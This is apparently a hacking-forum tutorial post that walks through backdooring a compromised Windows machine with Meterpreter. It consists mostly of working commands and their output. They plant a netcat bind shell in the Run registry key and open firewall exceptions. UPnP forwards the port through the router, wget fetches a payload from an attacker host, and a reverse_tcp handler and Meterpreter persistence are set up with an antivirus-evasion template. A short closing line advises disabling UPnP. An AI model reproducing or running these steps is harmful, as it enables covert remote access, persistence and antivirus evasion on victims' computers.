[TuT]How To ♥Fuck Firewall♥ With ♥Metasploit & UPnP♥[TuT] 05-01-2012, 08:20 PM
#1
Spoiler:
![[Image: upnpfucker.png]](http://img521.imageshack.us/img521/7696/upnpfucker.png)
YOU CAN DOWNLOAD UPNPC-STATIC ON THIS DIRECT LINK OR ON THIS SITE
Code:
meterpreter>upload /root/binup/nc.exe c:\\windows\\system32
meterpreter>upload /root/binup/upnpc-static.exe c:\\windows\\system32
meterpreter>upload /root/binup/wget.exe c:\\windows\\system32Spoiler:
Code:
meterpreter>reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe'THEN TYPE
Code:
meterpreter>shellCHECK THE OPEN PORT ON WINDOWS FIREWALL
Code:
C:\Windows\system32>netsh firewall show portopeningADD A RULE THAT CALLED "ServiceFirewall" FOR THE 455 PORT WITH THIS COMMAND
Code:
C:\Windows\system32>netsh firewall add portopening TCP 455 "ServiceFirewall" ENABLE ALLADD YOUR STUFF ON FIREWALL EXCEPTION
Code:
C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\exec.exe "exec" ENABLE
C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\nc.exe "nc" ENABLE
C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\wget.exe "wget" ENABLE
C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\upnpc-static.exe "upnp" ENABLELAUNCH THIS COMMAND FOR ADD A STATIC UPNP RULE
Code:
C:\Windows\system32>upnpc-static -a 172.30.1.10 455 455 TCP 0
upnpc : miniupnpc library test client. (c) 2006-2011 Thomas Bernard
Go to http://miniupnp.free.fr/ or http://miniupnp.tuxfamily.org/
for more information.
List of UPNP devices found on the network :
desc: http://172.30.1.1:2189/rootDesc.xml
st: urn:schemas-upnp-org:device:InternetGatewayDevice:1
Found valid IGD : http://172.30.1.1:2189/ctl/IPConn
Local LAN ip address : 172.30.1.10
ExternalIPAddress = 192.168.1.14
InternalIP:Port = 172.30.1.10:455
external 192.168.1.14:455 TCP is redirected to internal 172.30.1.10:455 (duration=0)NOW YOU HAVE CORRECTLY SETUP YOUR FIRST BACKDOOR, LET'S GO TO THE SECOND
![[Image: diapositive10hc.png]](http://img850.imageshack.us/img850/931/diapositive10hc.png)
Spoiler:
NOW YOU HAVE A SILENT ACCESS TO YOUR SLAVE YOU CAN SETUP YOUR 2ND BACKDOOR.
HOST A PAYLOAD ON A LOCAL OR A REMOTE SITE.
I CHOOSE THE LOCAL.
TYPE IN CONSOLE:
Code:
root@bt~:# nc 192.168.1.14 455
pfSense.lan [192.168.1.14] 455 (?) open
Microsoft Windows [version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Tous droits r�serv�s.
C:\Windows\system32>Code:
C:\Windows\system32>wget http://192.168.1.97/Msf.exe
--19:25:27-- http://192.168.1.97/Msf.exe
=> `Msf.exe'
Connecting to 192.168.1.97:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73,802 [application/x-msdos-program]
0K .......... .......... .......... .......... .......... 69% 48.83 MB/s
50K .......... .......... .. 100% 21.55 MB/s
19:25:27 (70.38 MB/s) - `Msf.exe' saved [73802/73802]OPEN A SECOND CONSOLE AND LAUNCH A LISTENER WITH :
Code:
root@bt~:#msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.97 Autorunscript='migrate -n explorer.exe' ECode:
C:\Windows\system32>Msf.exeWE USE A TEMPLATE FOR AVOID ANTIVIRUS WITH THE -T OPTION
Code:
meterpreter>run persistence -S -T /var/www/exec.exe -U -X -i 5 -p 4444(FORWARDED PORT) -r WAN ADDRESS OF YOUR INTERNET PROVIDERConclusion
UPnP is very dangerous
Even today, the UPnP IGD is enabled by default on many router.
I have read other articles dealing with the flaws in UPnP integrate flash or flaws XSS.
The best way to guard against this kind of attack is simply to disable it.
Even today, the UPnP IGD is enabled by default on many router.
I have read other articles dealing with the flaws in UPnP integrate flash or flaws XSS.
The best way to guard against this kind of attack is simply to disable it.

![[Image: diapositive1hc.png]](http://img526.imageshack.us/img526/9966/diapositive1hc.png)
![[Image: totalhc.png]](http://img16.imageshack.us/img16/5364/totalhc.png)
![[Image: total2hc.png]](http://img192.imageshack.us/img192/6438/total2hc.png)
![[+]](https://sinister.li/images/modern/collapse_collapsed.png)